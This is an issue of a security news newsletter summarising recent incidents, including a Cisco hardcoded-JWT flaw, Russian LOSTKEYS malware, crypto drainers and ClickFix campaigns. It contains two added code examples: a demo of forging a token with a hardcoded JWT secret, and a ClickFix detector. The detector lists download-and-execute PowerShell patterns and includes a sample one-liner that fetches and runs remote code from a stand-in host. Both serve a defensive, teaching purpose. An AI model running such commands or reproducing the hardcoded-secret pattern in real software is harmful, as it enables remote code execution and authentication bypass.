🎓️ Vulnerable U | #115

Massive Cisco 0day, New Russian malware intel, 38,000 domains ID'd in crypto draining operation, NSO spyware hit with massive fine, and much more!

Read Time: 9 minutes


Howdy friends!

This week has been a series of the Monday-est Mondays ever, one after the other. It was like drinking that cup of water where all the ice is stuck to the bottom. RSA happened. All the ice fell on my face.

I’m a bit stressed, a little sick from travel, and just completely drained from the marathon that is RSA week. 8am until ~10pm was booked solid every day. And I’ll do it all over again next year.

Thank you to DomainTools for hooking me up with some dedicated space to take meetings and hide/eat. Not even a sponsor, just gave back to me and a few other creators because they’re awesome.

ICYMI

🖊️ Something I wrote: lol, it finally happened and I sent last week’s newsletter with my “Link” placeholder here. Sorry! I was flying back from SF and just missed it. Thanks to those of you who pointed it out, appreciate you keeping me honest! - Now for this week: TeleMessage, the company behind the modified Signal client used by Trump admin officials, has been breached.

🎧️ Something I heard: Daniel Miessler and Jason Haddix - Reviewing RSA 2025

🎤 Something I said: Report: Identity is the new Malware

🔖 Something I read: Chris Krebs' recap of his experience at RSA, days after he was targeted by the current US administration.

Vulnerable News

Well, this is concerning. CISA and friends (FBI, EPA, DOE) just dropped an advisory about a new trend they're seeing: cybercriminals and other "lower-level" threat actors are increasingly targeting operational technology networks. Traditionally, OT (Operational Technology) and critical infrastructure were the playground of sophisticated nation-state hackers, but now the barrier to entry seems to be dropping. The culprit is good old-fashioned poor security hygiene: default passwords, internet-exposed systems, and those difficult-to-patch industrial devices.

The advisory specifically calls out attacks against oil and natural gas sectors, noting that while these intrusions often use "basic and elementary techniques," they can still cause serious damage including operational disruptions and even physical damage. The advice is pretty straightforward: get your OT devices off the internet, change those default passwords, air-gap your networks where possible, and lock down remote access. Simple stuff in theory, but we all know how challenging OT security can be in practice. (read more)

For Voice of Security 2025, sponsored by Tines and AWS, IDC surveyed security leaders in the US, Europe, and Australia.

The research uncovered that 72% of respondents saw increased workloads last year, yet, 58% consider their teams "properly staffed.” Where’s the disconnect? And what other challenges are leaders facing this year? Read the full white paper to hear more on:

  • AI adoption progress and top use cases

  • How teams are performing against key metrics

  • Tool stack strengths and weaknesses

  • The skills analysts need to succeed

*Sponsored

Day that ends in Y. Cisco released a patch for a nasty JWT vulnerability in IOS XE Wireless Controllers that scores a perfect 10.0 CVSS. The bug (CVE-2025-20188) lets remote attackers upload arbitrary files and execute root commands, all thanks to a hardcoded JWT. The attack vector requires the Out-of-Band AP Image Download feature to be enabled. It’s off by default, but if you’ve turned it on, you’ll want to patch ASAP, and probably spin up an incident.

The vulnerability impacts several Catalyst 9800 series controllers and embedded wireless solutions. Cisco’s internal team caught this one before it was exploited in the wild, but the potential impact is severe. If you can’t patch immediately, disable the Out-of-Band AP Image Download feature. Your APs will fall back to CAPWAP for updates without affecting client connections. (Read more)
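The hardcoded JWT is the whole story here: a token-signing secret baked into the firmware is known to every installation and to anyone who extracts the image, so any token it signs is "valid" everywhere. The following added example (not Cisco code, and not a reproduction of CVE-2025-20188) illustrates the class of bug with a minimal HS256 JWT implementation: the same token is accepted by a validator that still uses a shared build-time secret and rejected by one keyed with a per-deployment secret. The secret value, the claim names, and the `WLC_JWT_SECRET` environment variable are all constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import os
import secrets


def _b64url(data: bytes) -> str:
    """Base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict, secret: bytes) -> str:
    """Mint a compact HS256 JWT over the given claims."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_jwt(token: str, secret: bytes):
    """Return the claims if the HS256 signature checks out under `secret`, else None."""
    try:
        header, payload, sig = token.split(".")
        hdr = json.loads(_b64url_decode(header))
    except (ValueError, json.JSONDecodeError):
        return None
    if hdr.get("alg") != "HS256":          # refuse algorithm confusion (e.g. "none")
        return None
    expected = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        return None
    return json.loads(_b64url_decode(payload))


# Constructed stand-in for a secret compiled into a firmware image.  Every
# device built from that image shares it, which is the defect being shown.
HARDCODED_SECRET = b"example-build-time-secret-do-not-ship"


def load_deployment_secret() -> bytes:
    """Per-install secret: read from the environment, or generate one fresh.

    In a real device this would be generated at first boot and stored on the
    box; the env-var name is an assumption for this demo.
    """
    value = os.environ.get("WLC_JWT_SECRET")
    return value.encode() if value else secrets.token_bytes(32)


def demo():
    """Show the failure mode: one forged token, two validators.

    Returns (accepted_by_shared_secret_validator, accepted_by_per_install_validator).
    """
    claims = {"sub": "image-upload", "role": "admin"}   # constructed claims
    forged = sign_jwt(claims, HARDCODED_SECRET)          # anyone with the image can mint this
    accepted_shared = verify_jwt(forged, HARDCODED_SECRET) is not None
    accepted_hardened = verify_jwt(forged, load_deployment_secret()) is not None
    return accepted_shared, accepted_hardened


if __name__ == "__main__":
    print("accepted by shared-secret validator, by per-install validator:", demo())
```

The lesson for your own services is the same whether or not you run wireless controllers: a signing key that ships in a build artifact is effectively public, so generate it per deployment, keep it out of source and firmware, and treat rotation as a routine operation rather than an emergency one.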

Google’s Threat Intelligence team caught COLDRIVER (aka Star Blizzard) using a new malware called LOSTKEYS that’s specifically targeting Western government advisors, journalists, and NGOs. The malware uses a social-engineering trick we’ve been seeing more and more lately, a fake CAPTCHA page that tricks users into copying and pasting PowerShell commands. After some VM-evading checks, it deploys the final payload that steals files and system info.

This ties back to a December 2023 campaign where similar malware was disguised as Maltego software packages. The group, backed by Russia, has evolved from their credential-phishing playbook (SPICA in 2024) to more targeted document theft. They’re still after intelligence, but with a new level of sophistication against high-value Western targets. (Read more)

A massive crypto-draining operation called FreeDrain has been using industrial-scale SEO manipulation to steal wallet seed phrases. The attackers set up 38,000+ subdomains on legitimate platforms like gitbook.io and github.io, targeting users searching for wallet-related queries. When users land on these convincing phishing pages (complete with AI-generated content), they’re prompted to enter their seed phrase, and their funds are drained within minutes.

The operation appears to be run by a group working standard business hours in the IST timezone, suggesting this is literally their day job. This ties into another recent discovery about Inferno Drainer, a DaaS tool that’s stolen about $9M from 30k+ wallets despite claiming to shut down last November. Both are part of a broader trend of crypto-draining operations becoming more sophisticated, using legitimate services and advanced evasion techniques that make them particularly resilient to takedowns. (Read more)

LockBit just got a taste of their own medicine as their dark web affiliate panels were hacked and defaced with a cheeky message: "Don't do crime CRIME IS BAD xoxo from Prague." The attackers dumped LockBit's MySQL database, revealing a treasure trove of goodies including nearly 60K bitcoin addresses, build configurations, and most juicily, over 4,400 negotiation messages between the gang and their victims. They even exposed 75 admin/affiliate accounts with hilariously bad plaintext passwords like "Weekendlover69" and "LockbitProud231."

This couldn't come at a worse time for LockBit, who were still licking their wounds from Operation Cronos last year when law enforcement took down their infrastructure. Interestingly, the defacement message matches one used in a recent Everest ransomware breach, suggesting the same actor may be targeting multiple ransomware operations. (read more)

Europol’s latest PowerOFF operation just took down six more DDoS-for-hire platforms and nabbed four suspects in Poland. The targeted services (Cfxapi, Cfxsecurity, Neostress, Jetstress, Quickdown, and Zapcut) were being used to hit gaming platforms, businesses, government orgs, and schools between 2022 and 2025. This was a joint effort between Polish, Dutch, US, and German authorities, with the Dutch setting up honeypot booter services to warn potential customers about the consequences. The US also killed nine associated domains, while Dutch intel from seized booter sites helped Polish authorities make their arrests.

This continues the steady drumbeat of law-enforcement actions against DDoS-for-hire services we’ve seen lately, following the takedowns of DigitalStress and Anonymous Sudan’s infrastructure. These services had been offering DDoS attacks for just a few dollars, making large-scale attacks accessible to basically anyone with pocket change. (Read more)

Insight Partners, the $90B VC firm behind Twitter and HelloFresh, just confirmed they got hit with a social-engineering attack that led to data theft. The January breach exposed sensitive info including fund details, banking data, and personal information of employees and limited partners. While they contained it to a single day, the full scope is still being investigated.

No ransomware groups have claimed credit yet, which makes this one interesting. Could be someone sitting on the data for leverage, or a targeted theft of specific investment intel. Either way, Insight’s doing the usual mitigation dance: password changes, 2FA, and credit monitoring for those affected. (Read more)

Hey, remember when I said I was baffled about how this forked version of Signal that broke e2e, TeleMessage, got through government or big-bank procurement/security review? Turns out I was right to be baffled: a number of unnamed government agencies denied TeleMessage usage after it failed the most basic pressing on security questions.

Mandiant just dropped a detailed breakdown of UNC3944 (aka Scattered Spider) with some interesting insights into their latest tactics. They started with SIM-swapping telcos but pivoted to ransomware/extortion in 2023, hitting financial services in late 2023 and food services in May 2024. While their activity dipped after arrests in 2024, they’ve potentially bounced back through DragonForce ransomware, recently targeting UK retail.

The report’s meat is in their attack pattern: heavy social engineering (impersonating IT help desks), credential theft, and MFA bypass. Defense recommendations focus on identity hardening, strict verification for password/MFA changes, eliminating SMS auth, and isolating admin accounts. Endpoint controls and network segmentation, especially around management tools and backup infrastructure, are also key. These aren’t script kiddies. They’re a very persistent group that keeps adapting despite law-enforcement pressure. (Read more)

Iranian threat actors have set up a near-perfect clone of a German modeling agency’s website. The fake site runs obfuscated JavaScript to fingerprint visitors (collecting browser details, IP addresses, and device info) likely to identify specific targets. They even injected a fictitious model profile for “Shir Benzion” with a non-functional private album link, probably setting up a targeted phishing campaign.

The infrastructure and tactics point to Agent Serpens (aka APT35/Charming Kitten), known for targeting Iranian dissidents and activists abroad. While no direct victim interaction has been observed yet, the sophistication of the visitor-profiling and site impersonation suggests this is just the setup phase of a larger espionage operation. (Read more)

NSO Group just took a $167 million punch to the face. A jury ruled the spyware maker has to pay WhatsApp this dumptruck of money (plus about $445K in compensatory damages) for their 2019 hacking campaign that targeted over 1,400 users including journalists, activists, and dissidents. This caps a five-year legal saga where WhatsApp accused NSO of exploiting an audio-calling vulnerability to deploy their Pegasus spyware.

The verdict is the first major legal victory against the commercial spyware industry. Last December, a judge already determined NSO violated both federal and California hacking laws, so this trial was just to determine the price tag. NSO is making noise about appealing, but this is undeniably a massive blow to their business. As researcher John Scott-Railton put it, "NSO makes many millions of dollars helping dictators hack people... it only took the jury a day's deliberation to see right through to the heart of the matter." Not a great day to be in the dictator-helping business. (read more)

Lampion malware is back targeting Portuguese organizations with a new twist: they’ve adopted the ClickFix social-engineering technique that’s been making the rounds lately. The campaign hits government, finance, and transportation sectors with a complex infection chain starting from phishing emails. They built a multi-stage attack using heavily obfuscated VB scripts (we’re talking 30–50 MB of bloated code) and some clever scheduled-task tricks to evade detection.

It starts with a zip file leading to a fake Portuguese tax website where victims are tricked into running PowerShell commands to “fix” supposed computer issues. From there, it’s a sequence of VBS stages, with the final payload mysteriously commented out in the code. Most notable is their massive 700 MB DLL loader which is clearly designed to be too big for malware-scanning sites to handle. (Read more)
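Both the LOSTKEYS story above and this Lampion campaign lean on the same ClickFix move: a fake CAPTCHA or "fix your computer" page gets the user to paste a PowerShell one-liner into the Run dialog. Because the user is doing the typing, the telltale is not the payload but the launch shape: a script host spawned from the interactive shell with a command line that downloads and executes something, often with a CAPTCHA-themed comment tacked on so the pasted text looks legitimate. The added example below (my own detection sketch, not from Google's or the Lampion researchers' reports) scores process-creation events for that pattern. The pipe-delimited log format, hostnames, timestamps, and the `example.invalid` URL are all constructed for the demo; map the fields onto your EDR or Sysmon Event ID 1 / Security 4688 data in practice.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str     # parent process image name
    image: str      # created process image name
    cmdline: str    # full command line


def parse_line(line: str):
    """Parse a constructed 'ts|host|parent|image|cmdline' record (cmdline may contain '|')."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    return ProcEvent(*parts)


# Launch shape: Win+R / Run dialog spawns the script host directly under explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits, weighted; any one alone is common in admin scripts,
# so the threshold requires several to coincide.
RULES = [
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2, "encoded command"),
    (re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b", re.I), 2, "remote download"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), 2, "in-memory execution"),
    (re.compile(r"mshta(\.exe)?\s+[\"']?https?://", re.I), 3, "mshta remote HTA"),
    (re.compile(r"(not a robot|captcha|verif(y|ication))", re.I), 3, "CAPTCHA-themed text in command"),
]
THRESHOLD = 4


def score_event(ev: ProcEvent):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    if ev.parent.lower() in INTERACTIVE_PARENTS and ev.image.lower() in SCRIPT_HOSTS:
        score += 2
        reasons.append("script host launched from explorer.exe (Run dialog pattern)")
    for rx, weight, why in RULES:
        if rx.search(ev.cmdline):
            score += weight
            reasons.append(why)
    return score, reasons


def find_clickfix(lines):
    """Return [(host, score, reasons)] for events at or above THRESHOLD."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        score, reasons = score_event(ev)
        if score >= THRESHOLD:
            hits.append((ev.host, score, reasons))
    return hits


# Constructed sample log: one ClickFix-style launch and two benign PowerShell uses.
SAMPLE_LOG = [
    '2025-05-09T10:22:01Z|WS-042|explorer.exe|powershell.exe|powershell -w hidden -c "irm https://example.invalid/v | iex" # I am not a robot - reCAPTCHA Verification ID: 8372',
    '2025-05-09T10:30:12Z|WS-042|cmd.exe|powershell.exe|powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',
    r'2025-05-09T11:00:00Z|SRV-01|svchost.exe|powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
]


if __name__ == "__main__":
    for host, score, reasons in find_clickfix(SAMPLE_LOG):
        print(f"{host}: score {score}: {', '.join(reasons)}")
```

Tune the weights against your own baseline (scheduled tasks with hidden windows are normal in many fleets; a hidden window spawned from explorer.exe with a download-and-execute chain is not), and pair the detection with the prevention that removes the vector entirely: disabling the Run dialog for standard users via policy, and PowerShell script block logging so the pasted command is captured even when it never touches disk.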

Miscellaneous mattjay

The new pope is from Chicago and the memes are tickling just the right part of my brain

How'd I do this edition?

It's hard doing this in a vacuum. Screaming into a void. Feedback is incredibly valuable to make sure I'm making a newsletter you love getting every week.


Parting Thoughts:

Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.

Stay safe, Matt Johansen
@mattjay